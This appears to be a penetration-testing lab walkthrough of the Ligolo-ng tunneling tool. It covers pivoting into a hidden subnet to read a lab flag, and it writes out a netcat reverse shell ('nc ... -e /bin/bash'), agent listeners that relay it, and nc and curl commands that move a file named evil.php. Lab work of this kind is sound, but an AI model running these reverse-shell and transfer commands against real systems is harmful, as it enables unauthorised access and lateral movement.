Tunnel Like a Pro: Secure, Simple, and Efficient!
Ligolo-ng is a cutting-edge tool designed for penetration testers, enabling the creation of secure tunnels using TUN interfaces. It offers a lightweight, fast, and efficient alterUserive to traditional methods like SOCKS proxies. With features such as easy setup, automatic certificate configuration, and support for multiple platforms, Ligolo-ng simplifies complex tunneling tasks, making it a preferred choice for professionals seeking reliable and secure network tunneling solutions.
-
1
Download the files or use my scripts.
https://github.com/Nicocha30/ligolo-ng -
2
Lets start the server
proxyloco _________________________________________________________ AMD64 Ligolo-ng Proxy 0.5.1 Linux ¿Deseas descargar el proxy? [s/N] s _________________________________________________________ ¿Quieres iniciar la interfaz? [s/N] s [sudo] password for User: 3: ligolo: -
3
Download the agent
proxylocomenu _________________________________________________________ AMD64 1 ligolo-ng Agent 0.5.1 linux 2 ligolo-ng Proxy 0.5.1 linux ARM64 3 ligolo-ng Agent 0.5.1 linux 4 ligolo-ng Proxy 0.5.1 linux _________________________________________________________ Choose the number of the download you want: 1 _________________________________________________________ -
4
Transfer the agent to the machine
python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 192.168.88.159 - - [12/Jul/2024 21:25:44] "GET /agent HTTP/1.1" 200 - #From the other machine wget http://192.168.88.13:8000/agent --2024-07-12 21:25:44-- http://192.168.88.13:8000/agent Connecting to 192.168.88.13:8000... connected. HTTP request sent, awaiting response... 200 OK -
5
Start the agent
./agent -connect 192.168.88.13:11601 -ignore-cert WARN[0000] warning, certificate validation disabled INFO[0000] Connection established addr="192.168.88.13:11601" #on the server: ligolo-ng » INFO[0229] Agent joined. name=user@domain remote="192.168.88.159:40576" ligolo-ng » ^C input Ctrl-c once more to exit ligolo-ng » -
6
Server
ligolo-ng » session [Agent : user@domain] » ifconfig ┌────────────────────────────────────┐ │ Interface 0 │ ├──────────────┬─────────────────────┤ │ Name │ lo │ │ Hardware MAC │ │ │ MTU │ 65536 │ │ Flags │ up|loopback|running │ │ IPv4 Address │ 127.0.0.1/8 │ │ IPv6 Address │ ::1/128 │ └──────────────┴─────────────────────┘ ┌───────────────────────────────────────────────┐ │ Interface 1 │ ├──────────────┬────────────────────────────────┤ │ Name │ eth0 │ │ Hardware MAC │ bc:24:11:2e:2a:6c │ │ MTU │ 1500 │ │ Flags │ up|broadcast|multicast|running │ │ IPv4 Address │ 192.168.88.159/24 │ │ IPv6 Address │ fe80::be24:11ff:fe2e:2a6c/64 │ └──────────────┴────────────────────────────────┘ ┌───────────────────────────────────────┐ │ Interface 2 │ ├──────────────┬────────────────────────┤ │ Name │ virbr1 │ │ Hardware MAC │ 52:54:00:77:e0:cd │ │ MTU │ 1500 │ │ Flags │ up|broadcast|multicast │ │ IPv4 Address │ 192.168.50.1/24 │ └──────────────┴────────────────────────┘ ┌───────────────────────────────────────┐ │ Interface 3 │ ├──────────────┬────────────────────────┤ │ Name │ docker0 │ │ Hardware MAC │ 02:42:fa:66:f2:43 │ │ MTU │ 1500 │ │ Flags │ up|broadcast|multicast │ │ IPv4 Address │ 172.17.0.1/16 │ └──────────────┴────────────────────────┘ ┌───────────────────────────────────────────────┐ │ Interface 4 │ ├──────────────┬────────────────────────────────┤ │ Name │ virbr0 │ │ Hardware MAC │ 52:54:00:3e:1d:51 │ │ MTU │ 1500 │ │ Flags │ up|broadcast|multicast|running │ │ IPv4 Address │ 192.168.122.1/24 │ └──────────────┴────────────────────────────────┘-
6.1
Server terminal - no ligolo
❯ ip a 1: lo: -
6.2
Connect the subnet
sudo ip route add 192.168.122.0/24 dev ligolo [sudo] password for #START the session back in ligolo terminal [Agent : user@domain] » start [Agent : user@domain] » INFO[1104] Starting tunnel to User@domain
-
6.1
-
7
Check the flag from the server terminal (no ligolo)
❯ curl 192.168.122.205 ligolo-ng flag:1219kj91 ❯ ping 192.168.122.205 PING 192.168.122.205 (192.168.122.205) 56(84) bytes of data. 64 bytes from 192.168.122.205: icmp_seq=1 ttl=64 time=8.50 ms 64 bytes from 192.168.122.205: icmp_seq=2 ttl=64 time=11.7 ms #apache server on the subnet 122 -
1
Start nc on the proxy server machine
ncat -lvnp 1234 --keep-open #also nc -lvnp 1234 Ncat: Version 7.94SVN ( https://nmap.org/ncat ) Ncat: Listening on [::]:1234 Ncat: Listening on 0.0.0.0:1234 -
2
on the machine connect nc to the agent IP, no to the proxy server
nc 192.168.220.1 1234 -e /bin/bash ip r 192.168.220.0/24 dev enp1s0 proto kernel scope link src 192.168.220.234 -
1
#[Agent : User@Domain] » listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 [Agent : User@Domain] » listener_list ┌────────────────────────────────────────────────────────────────────────────────────────────────────┐ │ Active listeners │ ├───┬────────────────────────────────────┬─────────┬────────────────────────┬────────────────────────┤ │ # │ AGENT │ NETWORK │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │ ├───┼────────────────────────────────────┼─────────┼────────────────────────┼────────────────────────┤ │ 0 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp │ 0.0.0.0:30000 │ 127.0.0.1:10000 │ │ 1 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp │ 192.168.220.1:30001 │ 127.0.0.1:10001 │ │ 2 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp │ 192.168.220.1:1234 │ 127.0.0.1:1234 │ │ 3 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp │ 0.0.0.0:8080 │ 127.0.0.1:80 │ └───┴────────────────────────────────────┴─────────┴────────────────────────┴────────────────────────┘ But we can also use the same port 1234 from last connection -
2
On kali
python3 -m http.server 1234 curl -O 192.168.220.1:1234/test % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 6 100 6 0 0 742 0 --:--:-- --:--:-- --:--:-- 750 ❯ ls test wget http://192.168.220.1:1234/test --2024-07-12 23:28:39-- http://192.168.220.1:1234/test Connecting to 192.168.220.1:1234... connected. HTTP request sent, awaiting response... 200 OK Length: 6 [application/octet-stream] Saving to: ‘test.1’ test.1 100%[==========================================================>] 6 --.-KB/s in 0s 2024-07-12 23:28:39 (573 KB/s) - ‘test.1’ saved [6/6] ❯ ls test test.1 -
3
Using nc to send files
#kali nc -nlvp 1234 < evil.php Listening on 0.0.0.0 1234 #on the other machine nc -nv 192.168.220.1 1234 > evil.php (UNKNOWN) [192.168.220.1] 1234 (?) open ❯ ls evil.php -
4
Using python script
#kali (I had to change the port in the script to 1234) ❯ getpython #to receive files with Python 2, from the other machine, do a curl like this: #generic message #curl -T file http://192.168.88.19:8000 #generic message #on the other machine remember to use the IP from the client, no kali curl -T evil.php 192.168.220.1:1234 curl: (52) Empty reply from server #back kali Host: 192.168.220.1:1234 User-Agent: curl/7.88.1 Accept: */* Content-Length: 9 Expect: 100-continue ❯ ls evil.php
Listener on the agent for reverse shell
[Agent : user@Domain] » listener_add --addr 192.168.220.1:1234 --to 127.0.0.1:1234 --tcp
INFO[0418] Listener 0 created on remote agent!
[Agent : user@Domain] » listener_add --addr 192.168.220.1:1234 --to 127.0.0.1:1234 --tcp
INFO[0418] Listener 0 created on remote agent!
Setting a server to transfer files
Adding a listener
Ready, enjoy.